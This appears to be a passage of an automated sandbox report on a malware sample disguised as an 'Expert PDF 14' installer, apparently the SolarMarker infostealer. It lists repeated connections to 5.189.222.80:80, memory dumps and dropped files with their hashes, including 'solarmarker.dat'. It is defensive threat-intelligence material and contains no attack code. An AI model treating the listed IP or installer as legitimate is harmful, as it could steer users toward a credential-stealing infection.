| ES | 5.189.222.80:80 | | tcp |
| ES | 5.189.222.80:80 | | tcp |
| ES | 5.189.222.80:80 | | tcp |
| ES | 5.189.222.80:80 | | tcp |
| ES | 5.189.222.80:80 | | tcp |
| ES | 5.189.222.80:80 | | tcp |
| ES | 5.189.222.80:80 | | tcp |
| ES | 5.189.222.80:80 | | tcp |
| ES | 5.189.222.80:80 | | tcp |
| ES | 5.189.222.80:80 | | tcp |
| ES | 5.189.222.80:80 | | tcp |
| ES | 5.189.222.80:80 | | tcp |
| ES | 5.189.222.80:80 | | tcp |
| ES | 5.189.222.80:80 | | tcp |
| ES | 5.189.222.80:80 | | tcp |
| ES | 5.189.222.80:80 | | tcp |
| ES | 5.189.222.80:80 | | tcp |
Files
memory/1644-133-0x0000000000400000-0x0000000000501000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\is-AB559.tmp\07d8c9f5-af55-421d-9023-7932ab1810d7.tmp
| MD5 | a95712856401dda069ee07c719bdb2ab |
| SHA1 | 73293e45116e0930d78087741016cde920922a74 |
| SHA256 | b4878d6b9d7462cafe81d20da148a44750aa707f4e34eae1f23f21f9e0d9afa0 |
| SHA512 | 2ea973307830b193379a0b7698682bfecdfcc6bab685dcf60af1c23c94b16b862924148a2f9e8b2ac2b7734c3552193dc0459c7961ab8730b0282101fa22ff85 |
C:\Users\Admin\AppData\Local\Temp\is-48SRK.tmp\_isetup\_isdecmp.dll
| MD5 | c6ae924ad02500284f7e4efa11fa7cfc |
| SHA1 | 2a7770b473b0a7dc9a331d017297ff5af400fed8 |
| SHA256 | 31d04c1e4bfdfa34704c142fa98f80c0a3076e4b312d6ada57c4be9d9c7dcf26 |
| SHA512 | f321e4820b39d1642fc43bf1055471a323edcc0c4cbd3ddd5ad26a7b28c4fb9fc4e57c00ae7819a4f45a3e0bb9c7baa0ba19c3ceedacf38b911cdf625aa7ddae |
C:\Users\Admin\AppData\Local\Temp\is-48SRK.tmp\_isetup\_isdecmp.dll
| MD5 | c6ae924ad02500284f7e4efa11fa7cfc |
| SHA1 | 2a7770b473b0a7dc9a331d017297ff5af400fed8 |
| SHA256 | 31d04c1e4bfdfa34704c142fa98f80c0a3076e4b312d6ada57c4be9d9c7dcf26 |
| SHA512 | f321e4820b39d1642fc43bf1055471a323edcc0c4cbd3ddd5ad26a7b28c4fb9fc4e57c00ae7819a4f45a3e0bb9c7baa0ba19c3ceedacf38b911cdf625aa7ddae |
memory/3672-144-0x0000000002810000-0x0000000002811000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\is-48SRK.tmp\Expert_PDF.exe
| MD5 | 440d4f0c478b77d0e1a95e8165dfb650 |
| SHA1 | d8cd10e080167a93273a6969b61648ce9b9debb2 |
| SHA256 | 19834ba63fc5f104f81d991a93593acde4bb49c10883e66344b8797caf4a5462 |
| SHA512 | a8c0b99c9f7f64ad440dd640f5e00b471514fd322af565796dd8fac8b4aabb693ccbcf1698e7082a3e1e188ead68081db13197555ba6b1ff5ef1dbc7b32bbbc5 |
C:\Users\Admin\AppData\Local\Temp\is-48SRK.tmp\Expert_PDF.exe
| MD5 | 440d4f0c478b77d0e1a95e8165dfb650 |
| SHA1 | d8cd10e080167a93273a6969b61648ce9b9debb2 |
| SHA256 | 19834ba63fc5f104f81d991a93593acde4bb49c10883e66344b8797caf4a5462 |
| SHA512 | a8c0b99c9f7f64ad440dd640f5e00b471514fd322af565796dd8fac8b4aabb693ccbcf1698e7082a3e1e188ead68081db13197555ba6b1ff5ef1dbc7b32bbbc5 |
C:\Users\Admin\AppData\Local\Temp\is-48SRK.tmp\Expert_PDF.exe
| MD5 | 440d4f0c478b77d0e1a95e8165dfb650 |
| SHA1 | d8cd10e080167a93273a6969b61648ce9b9debb2 |
| SHA256 | 19834ba63fc5f104f81d991a93593acde4bb49c10883e66344b8797caf4a5462 |
| SHA512 | a8c0b99c9f7f64ad440dd640f5e00b471514fd322af565796dd8fac8b4aabb693ccbcf1698e7082a3e1e188ead68081db13197555ba6b1ff5ef1dbc7b32bbbc5 |
C:\ProgramData\Expert PDF 14\Installation\Statistics.dll
| MD5 | e645ca01c01f9f8489c07a6b41fbd318 |
| SHA1 | 3e8ea394f6605bd8529c58a143f01675adee371a |
| SHA256 | a9145b41491019af4e89c5736c0d9d1fc83ab9786ec3dfb27da9be4e40cff27e |
| SHA512 | c220bd620f03f38286899ed124abde69ed0812c2c1ef84031a02abd39faa4975255bc6a2bff8900d0294ac2f508344131be8cc6d8765aa46d430a135bb1af2b6 |
C:\ProgramData\Expert PDF 14\Installation\Statistics.dll
| MD5 | e645ca01c01f9f8489c07a6b41fbd318 |
| SHA1 | 3e8ea394f6605bd8529c58a143f01675adee371a |
| SHA256 | a9145b41491019af4e89c5736c0d9d1fc83ab9786ec3dfb27da9be4e40cff27e |
| SHA512 | c220bd620f03f38286899ed124abde69ed0812c2c1ef84031a02abd39faa4975255bc6a2bff8900d0294ac2f508344131be8cc6d8765aa46d430a135bb1af2b6 |
C:\ProgramData\Expert PDF 14\Installation\Expert_PDF_14_Installer.exe
| MD5 | 440d4f0c478b77d0e1a95e8165dfb650 |
| SHA1 | d8cd10e080167a93273a6969b61648ce9b9debb2 |
| SHA256 | 19834ba63fc5f104f81d991a93593acde4bb49c10883e66344b8797caf4a5462 |
| SHA512 | a8c0b99c9f7f64ad440dd640f5e00b471514fd322af565796dd8fac8b4aabb693ccbcf1698e7082a3e1e188ead68081db13197555ba6b1ff5ef1dbc7b32bbbc5 |
C:\ProgramData\Expert PDF 14\Installation\Expert_PDF_14_Installer.exe
| MD5 | 440d4f0c478b77d0e1a95e8165dfb650 |
| SHA1 | d8cd10e080167a93273a6969b61648ce9b9debb2 |
| SHA256 | 19834ba63fc5f104f81d991a93593acde4bb49c10883e66344b8797caf4a5462 |
| SHA512 | a8c0b99c9f7f64ad440dd640f5e00b471514fd322af565796dd8fac8b4aabb693ccbcf1698e7082a3e1e188ead68081db13197555ba6b1ff5ef1dbc7b32bbbc5 |
memory/1644-176-0x0000000000400000-0x0000000000501000-memory.dmp
C:\ProgramData\Expert PDF 14\Installation\Statistics.dll
| MD5 | e645ca01c01f9f8489c07a6b41fbd318 |
| SHA1 | 3e8ea394f6605bd8529c58a143f01675adee371a |
| SHA256 | a9145b41491019af4e89c5736c0d9d1fc83ab9786ec3dfb27da9be4e40cff27e |
| SHA512 | c220bd620f03f38286899ed124abde69ed0812c2c1ef84031a02abd39faa4975255bc6a2bff8900d0294ac2f508344131be8cc6d8765aa46d430a135bb1af2b6 |
C:\ProgramData\Expert PDF 14\Installation\Statistics.dll
| MD5 | e645ca01c01f9f8489c07a6b41fbd318 |
| SHA1 | 3e8ea394f6605bd8529c58a143f01675adee371a |
| SHA256 | a9145b41491019af4e89c5736c0d9d1fc83ab9786ec3dfb27da9be4e40cff27e |
| SHA512 | c220bd620f03f38286899ed124abde69ed0812c2c1ef84031a02abd39faa4975255bc6a2bff8900d0294ac2f508344131be8cc6d8765aa46d430a135bb1af2b6 |
memory/1924-191-0x0000000000C70000-0x0000000000CA6000-memory.dmp
memory/1924-192-0x0000000004E20000-0x0000000005448000-memory.dmp
memory/3672-193-0x0000000000400000-0x0000000000723000-memory.dmp
memory/1924-197-0x00000000047E0000-0x00000000047F0000-memory.dmp
memory/4392-198-0x00000000030B0000-0x00000000030C0000-memory.dmp
memory/3676-196-0x0000000004520000-0x0000000004530000-memory.dmp
memory/4392-199-0x00000000030B0000-0x00000000030C0000-memory.dmp
memory/4252-200-0x0000000002F20000-0x0000000002F30000-memory.dmp
memory/3676-201-0x0000000004520000-0x0000000004530000-memory.dmp
memory/3080-202-0x0000000005610000-0x0000000005620000-memory.dmp
memory/1568-203-0x0000000003080000-0x0000000003090000-memory.dmp
memory/3080-204-0x0000000005980000-0x00000000059A2000-memory.dmp
memory/4392-206-0x0000000005D70000-0x0000000005DD6000-memory.dmp
memory/2492-205-0x0000000004F10000-0x0000000004F20000-memory.dmp
memory/4392-208-0x0000000005DE0000-0x0000000005E46000-memory.dmp
memory/980-209-0x0000000003240000-0x0000000003250000-memory.dmp
memory/980-207-0x0000000003240000-0x0000000003250000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_umbfj5me.3wd.psm1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/3672-293-0x0000000000400000-0x0000000000723000-memory.dmp
memory/5020-303-0x0000000005230000-0x0000000005240000-memory.dmp
memory/2492-304-0x0000000004F10000-0x0000000004F20000-memory.dmp
memory/1644-306-0x0000000000400000-0x0000000000501000-memory.dmp
memory/3080-307-0x0000000006850000-0x000000000686E000-memory.dmp
C:\Users\Admin\d42bf9d5b6efb8ac6fe79a881e3d037e\f612d312080190743c333ce6f036a08b\774993c53916d2cabd3093113aba2438\4015a7944708b530fadfa1e4d3902c78\3e985328b31761cd84eaaa320cd28e3c\f104fb2467d873ac041bbbdffbb51cd0\61febf04862f7148e24a3df67bcbb2b8
| MD5 | 9ad7347a02f60aa376133856f8618acb |
| SHA1 | 3377b9738c82647ff6f0fc741c58548fa8caaf31 |
| SHA256 | a4f9f4c9dfbe2e61dd8ebe5d1d9bd8a519d5a7833f2653820671a16b49855fea |
| SHA512 | a912a3e881168ce1dc23d0c715323a7b02b0c522fd49f7da236d97f8cbb183c2d4bf2be97bac973dfba5852a607ad849e815afdd1c7f033bddafcc0303f18687 |
memory/5020-309-0x0000000005230000-0x0000000005240000-memory.dmp
memory/4392-310-0x00000000030B0000-0x00000000030C0000-memory.dmp
memory/2456-311-0x0000000002590000-0x00000000025A0000-memory.dmp
memory/1568-313-0x0000000003080000-0x0000000003090000-memory.dmp
memory/3676-312-0x0000000004520000-0x0000000004530000-memory.dmp
memory/3676-315-0x0000000005F30000-0x0000000005F4A000-memory.dmp
memory/5020-316-0x0000000006C90000-0x0000000006CB2000-memory.dmp
memory/4252-314-0x00000000074C0000-0x0000000007556000-memory.dmp
memory/4392-317-0x0000000007A10000-0x0000000007FB4000-memory.dmp
memory/4252-318-0x0000000002F20000-0x0000000002F30000-memory.dmp
memory/2492-319-0x0000000004F10000-0x0000000004F20000-memory.dmp
memory/5020-320-0x0000000008C40000-0x00000000092BA000-memory.dmp
memory/3676-321-0x0000000004520000-0x0000000004530000-memory.dmp
memory/3676-323-0x0000000004520000-0x0000000004530000-memory.dmp
memory/4392-322-0x00000000030B0000-0x00000000030C0000-memory.dmp
memory/1568-324-0x0000000003080000-0x0000000003090000-memory.dmp
memory/4252-326-0x0000000002F20000-0x0000000002F30000-memory.dmp
memory/4252-330-0x0000000002F20000-0x0000000002F30000-memory.dmp
C:\Users\Admin\AppData\Roaming\wGITVhmXWQSqpZKRCtElfrun\TesVNngiWXdzUEPmMOBYwhcAuCZyRfIktrSaKvjFpJQLGlxbHoDq
| MD5 | 21fb2997c5f3ae724b68c0abe70d24dc |
| SHA1 | a67e74c07b67c7b88260bc0b79d2306312f01b41 |
| SHA256 | 8ffb8a0883f778a001250e734ec0d1ca8a3298a5c0bbcf413925f90d8e5f2fb2 |
| SHA512 | 67cb54e8f0d0c0391cb9c60ec05b312f19e6934bd3affe9b08237d6932acd76b07a4a3075341cd153796211afd5fe3d684825ecfc49e17f2788b37df0bc0ad42 |
memory/1924-334-0x00000000047E0000-0x00000000047F0000-memory.dmp
memory/3080-335-0x0000000005610000-0x0000000005620000-memory.dmp
memory/1568-337-0x0000000003080000-0x0000000003090000-memory.dmp
memory/4392-328-0x00000000030B0000-0x00000000030C0000-memory.dmp
memory/980-340-0x0000000003240000-0x0000000003250000-memory.dmp
memory/2492-338-0x0000000004F10000-0x0000000004F20000-memory.dmp
memory/980-341-0x0000000003240000-0x0000000003250000-memory.dmp
memory/5020-359-0x0000000005230000-0x0000000005240000-memory.dmp
memory/2492-360-0x0000000004F10000-0x0000000004F20000-memory.dmp
memory/2456-362-0x0000000002590000-0x00000000025A0000-memory.dmp
C:\Users\Admin\appdata\roaming\solarmarker.dat
| MD5 | 3afc886140acb1fb8adf64e7de31aaf3 |
| SHA1 | 4045e92781bb6d0218ad556103bd7cf2744d471d |
| SHA256 | cd7fe991a85849fdeca6d5891561672feb6f12b5d52fd5dc00b3c6d3e1754f9a |
| SHA512 | 14f5e327c64c49ccb4f2874766c587f23b87908fee260b1e265b501f115bbd5f2260554c6283dd6e6a0dc8b40d17d2a8f7bad220bdce332a78b9590a4faca826 |
memory/5020-369-0x0000000005230000-0x0000000005240000-memory.dmp
memory/4392-371-0x00000000030B0000-0x00000000030C0000-memory.dmp
memory/3676-373-0x0000000004520000-0x0000000004530000-memory.dmp
memory/2456-372-0x0000000002590000-0x00000000025A0000-memory.dmp
memory/1568-374-0x0000000003080000-0x0000000003090000-memory.dmp
memory/1924-375-0x00000000047E0000-0x00000000047F0000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
| MD5 | d4d8cef58818612769a698c291ca3b37 |
| SHA1 | 54e0a6e0c08723157829cea009ec4fe30bea5c50 |
| SHA256 | 98fd693b92a71e24110ce7d018a117757ffdfe0e551a33c5fa5d8888a2d74fb0 |
| SHA512 | f165b1dde8f251e95d137a466d9bb77240396e289d1b2f8f1e9a28a6470545df07d00da6449250a1a0d73364c9cb6c00fd6229a385585a734da1ac65ac7e57f6 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
| MD5 | d4d8cef58818612769a698c291ca3b37 |
| SHA1 | 54e0a6e0c08723157829cea009ec4fe30bea5c50 |
| SHA256 | 98fd693b92a71e24110ce7d018a117757ffdfe0e551a33c5fa5d8888a2d74fb0 |
| SHA512 | f165b1dde8f251e95d137a466d9bb77240396e289d1b2f8f1e9a28a6470545df07d00da6449250a1a0d73364c9cb6c00fd6229a385585a734da1ac65ac7e57f6 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
| MD5 | d4d8cef58818612769a698c291ca3b37 |
| SHA1 | 54e0a6e0c08723157829cea009ec4fe30bea5c50 |
| SHA256 | 98fd693b92a71e24110ce7d018a117757ffdfe0e551a33c5fa5d8888a2d74fb0 |
| SHA512 | f165b1dde8f251e95d137a466d9bb77240396e289d1b2f8f1e9a28a6470545df07d00da6449250a1a0d73364c9cb6c00fd6229a385585a734da1ac65ac7e57f6 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
| MD5 | d4d8cef58818612769a698c291ca3b37 |
| SHA1 | 54e0a6e0c08723157829cea009ec4fe30bea5c50 |
| SHA256 | 98fd693b92a71e24110ce7d018a117757ffdfe0e551a33c5fa5d8888a2d74fb0 |
| SHA512 | f165b1dde8f251e95d137a466d9bb77240396e289d1b2f8f1e9a28a6470545df07d00da6449250a1a0d73364c9cb6c00fd6229a385585a734da1ac65ac7e57f6 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
| MD5 | d4d8cef58818612769a698c291ca3b37 |
| SHA1 | 54e0a6e0c08723157829cea009ec4fe30bea5c50 |
| SHA256 | 98fd693b92a71e24110ce7d018a117757ffdfe0e551a33c5fa5d8888a2d74fb0 |
| SHA512 | f165b1dde8f251e95d137a466d9bb77240396e289d1b2f8f1e9a28a6470545df07d00da6449250a1a0d73364c9cb6c00fd6229a385585a734da1ac65ac7e57f6 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
memory/4252-386-0x0000000002F20000-0x0000000002F30000-memory.dmp
memory/2492-387-0x0000000004F10000-0x0000000004F20000-memory.dmp
memory/980-388-0x0000000003240000-0x0000000003250000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
| MD5 | d4d8cef58818612769a698c291ca3b37 |
| SHA1 | 54e0a6e0c08723157829cea009ec4fe30bea5c50 |
| SHA256 | 98fd693b92a71e24110ce7d018a117757ffdfe0e551a33c5fa5d8888a2d74fb0 |
| SHA512 | f165b1dde8f251e95d137a466d9bb77240396e289d1b2f8f1e9a28a6470545df07d00da6449250a1a0d73364c9cb6c00fd6229a385585a734da1ac65ac7e57f6 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
| MD5 | d4d8cef58818612769a698c291ca3b37 |
| SHA1 | 54e0a6e0c08723157829cea009ec4fe30bea5c50 |
| SHA256 | 98fd693b92a71e24110ce7d018a117757ffdfe0e551a33c5fa5d8888a2d74fb0 |
| SHA512 | f165b1dde8f251e95d137a466d9bb77240396e289d1b2f8f1e9a28a6470545df07d00da6449250a1a0d73364c9cb6c00fd6229a385585a734da1ac65ac7e57f6 |